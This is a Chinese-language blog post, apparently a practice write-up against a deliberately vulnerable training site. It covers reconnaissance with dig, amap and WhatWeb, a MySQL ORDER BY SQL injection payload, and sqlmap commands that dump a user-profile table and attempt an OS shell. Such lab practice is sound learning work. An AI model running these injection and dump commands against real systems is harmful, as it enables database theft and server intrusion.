这个网站上面有很多的OWASP10的缺陷,可以练习提高我们的技术水平.1. 首先尝试下Amap, Amap 作为一个扫描工具,可以探测 Web Application 的Version.点击(此处)折叠或打开https://tools.kali.org/information-gathering/amap首先,我们来找出hackyourselffirst.troyhunt.com 的IP地址.点击(此处)折叠或打开 dig @8.8.8.8 hackyourselffirst.troyhunt.com A; > DiG 9.10.3-P4-Debian > @8.8.8.8 hackyourselffirst.troyhunt.com A; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 512;; QUESTION SECTION:;hackyourselffirst.troyhunt.com. IN A;; ANSWER SECTION:hackyourselffirst.troyhunt.com. 286 IN CNAME hackyourselffirst.azurewebsites.net.hackyourselffirst.azurewebsites.net. 3586 IN CNAME waws-prod-bay-003.vip.azurewebsites.windows.net.waws-prod-bay-003.vip.azurewebsites.windows.net. 286 IN CNAME waws-prod-bay-003.cloudapp.net.waws-prod-bay-003.cloudapp.net. 46 IN A 137.117.17.70;; Query time: 52 msec;; SERVER: 8.8.8.8#53(8.8.8.8);; WHEN: Mon Nov 20 14:59:53 CST 2017;; MSG SIZE rcvd: 223IP地址是137.117.17.70 , 同时我们可以知道这个hackyourselffirst.troyhunt.com 有很多的别名(CNAME).然后用Amap来探测下后台的Web application.点击(此处)折叠或打开amap -bqv 137.117.17.70 80Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggersUsing response file /etc/amap/appdefs.resp ... loaded 346 responsesUsing trigger file /etc/amap/appdefs.rpc ... loaded 450 triggersamap v5.4 (www.thc.org/thc-amap) started at 2017-11-20 15:02:35 - APPLICATION MAPPING modeTotal amount of tasks to perform in plain connect mode: 23Waiting for timeout on 23 connections ...Protocol on 137.117.17.70:80/tcp matches http - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n!DOCTYPE html>\r\nhtml>\r\nhead>\r\n title>Microsoft Azure Web App - Error 404/titlProtocol on 137.117.17.70:80/tcp matches http-iis - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n!DOCTYPE html>\r\nhtml>\r\nhead>\r\n title>Microsoft Azure Web App - Error 404/titlProtocol on 137.117.17.70:80/tcp matches http-apache-2 - banner: HTTP/1.1 400 Bad Request\r\nContent-Type text/html; charset=us-ascii\r\nServer Microsoft-HTTPAPI/2.0\r\nDate Mon, 20 Nov 2017 070234 GMT\r\nConnection close\r\nContent-Length 326\r\n\r\n!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"结果并不明确,这个网站使用的可能是IIS 也可能是Apache .Amap的结果不让人满意,接着尝试Whatweb scanner2. Whatweb 的网站 https://www.morningstarsecurity.com/research/whatwebWhatweb的命令行参数看起来要多的多.点击(此处)折叠或打开Usage: whatweb [options] URLs>TARGET SELECTION: TARGETs> Enter URLs, hostnames, IP adddresses, or nmap-format IP ranges. --input-file=FILE, -i Read targets from a file.AGGRESSION: --aggression, -a=LEVEL Set the aggression level. Default: 1. 1. Stealthy Makes one HTTP request per target and also follows redirects. 3. Aggressive If a level 1 plugin is matched, additional requests will be made.PLUGINS: --list-plugins, -l List all plugins. --info-plugins, -I=[SEARCH] List all plugins with detailed information. Optionally search with a keyword. --search-plugins=STRING Search plugins for a keyword. --grep, -g=STRING Search for STRING in HTTP responses. Reports with a plugin named Grep.OUTPUT: --verbose, -v Verbose output includes plugin descriptions. Use twice for debugging. --colour,--color=WHEN control whether colour is used. WHEN may be `never', `always', or `auto'. HELP & MISCELLANEOUS: --short-help This short usage help. --help, -h Complete usage help.EXAMPLE USAGE:* Scan example.com. ./whatweb example.com* Scan reddit.com slashdot.org with verbose plugin descriptions. ./whatweb -v reddit.com slashdot.org* An aggressive scan of wired.com detects the exact version of WordPress. ./whatweb -a 3 www.wired.com* Scan the local network quickly and suppress errors. whatweb --no-errors 192.168.0.0/24* Scan the local network for HTTPS websites. whatweb --no-errors --url-prefix https:// 192.168.0.0/24* Scan for crossdomain policies in the Alexa Top 1000. ./whatweb -i plugin-development/alexa-top-100.txt \ --url-suffix /crossdomain.xml -p crossdomain_xml Note: This is the short usage help. For the complete usage help use -h or --help.使用whatWeb来探测下,得到的信息要多的多.点击(此处)折叠或打开whatweb -v hackyourselffirst.troyhunt.comWhatWeb report for http://hackyourselffirst.troyhunt.comStatus : 200 OKTitle : Supercar Showdown - Supercar ShowdownIP : 137.117.17.70Country : UNITED STATES, USSummary : JQuery, ASP_NET[4.0.30319][MVC5.1], HttpOnly[ARRAffinity,ASP.NET_SessionId], Cookies[ARRAffinity,ASP.NET_SessionId,VisitStart], UncommonHeaders[x-aspnetmvc-version], HTML5, X-Powered-By[ASP.NET], X-XSS-Protection[0], Microsoft-IIS[8.0], Script[text/javascript], HTTPServer[Microsoft-IIS/8.0], Google-Analytics[Universal][UA-43629727-1]Detected Plugins:[ ASP_NET ] ASP.NET is a free web framework that enables great Web applications. Used by millions of developers, it runs some of the biggest sites in the world. Version : 4.0.30319 (from X-AspNet-Version HTTP header) String : MVC5.1 Google Dorks: (2) Website : http://www.asp.net/[ Cookies ] Display the names of cookies in the HTTP headers. The values are not returned to save on space. String : ASP.NET_SessionId String : VisitStart String : ARRAffinity[ Google-Analytics ] This plugin identifies the Google Analytics account. Version : Universal Account : UA-43629727-1 Website : http://www.google.com/analytics/[ HTML5 ] HTML version 5, detected by the doctype declaration[ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. String : Microsoft-IIS/8.0 (from server string)[ HttpOnly ] If the HttpOnly flag is included in the HTTP set-cookie response header and the browser supports it then the cookie cannot be accessed through client side script - More Info: http://en.wikipedia.org/wiki/HTTP_cookie String : ARRAffinity,ASP.NET_SessionId[ JQuery ] A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/[ Microsoft-IIS ] Microsoft Internet Information Services (IIS) for Windows Server is a flexible, secure and easy-to-manage Web server for hosting anything on the Web. From media streaming to web application hosting, IIS's scalable and open architecture is ready to handle the most demanding tasks. Version : 8.0 Website : http://www.iis.net/[ Script ] This plugin detects instances of script HTML elements and returns the script language/type. String : text/javascript[ UncommonHeaders ] Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String : x-aspnetmvc-version (from headers)[ X-Powered-By ] X-Powered-By HTTP header String : ASP.NET (from x-powered-by string)[ X-XSS-Protection ] This plugin retrieves the X-XSS-Protection value from the HTTP header. - More Info: http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29. aspx String : 0HTTP Headers: HTTP/1.1 200 OK Cache-Control: private Content-Length: 3276 Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/8.0 Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/ X-XSS-Protection: 0 X-AspNetMvc-Version: 5.1 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com Date: Mon, 20 Nov 2017 07:53:11 GMT Connection: close3. 使用sqlmap 来做sqlinjection .URL: http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid这里因为是orderby ,所以payload 应该是 orderby 字句,遗憾的是我不会sqlserver orderby 的hack. 只能依赖sqlmap了,如果是mysql, 可以使用如下的sql语句来hack.点击(此处)折叠或打开select id from news where id=1 order by 1,(select case when(1=2) then 1 else 1* (select table_name from information_schema.tables)end)=1;sqlmap是个很强大的武器,经过我的实验,以下都能使用.其中dump数据的最后一个语句要跑4,5分钟的样子。点击(此处)折叠或打开sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dbssqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-usersqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-dbsqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --tables -D 'hackyourselffirst_db'sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --column -T UserProfile -D 'hackyourselffirst_db'sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dump -T UserProfile -D 'hackyourselffirst_db唯独--os-shell 的语句并不成功.点击(此处)折叠或打开sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --os-shell不过我已经很满足了,sqlmap 是个很强大的自动化sqlinjection 工具。一个人不见得能掌握所有的可以hack的sql 字句,sqlmap这时候起到了很关键的作用。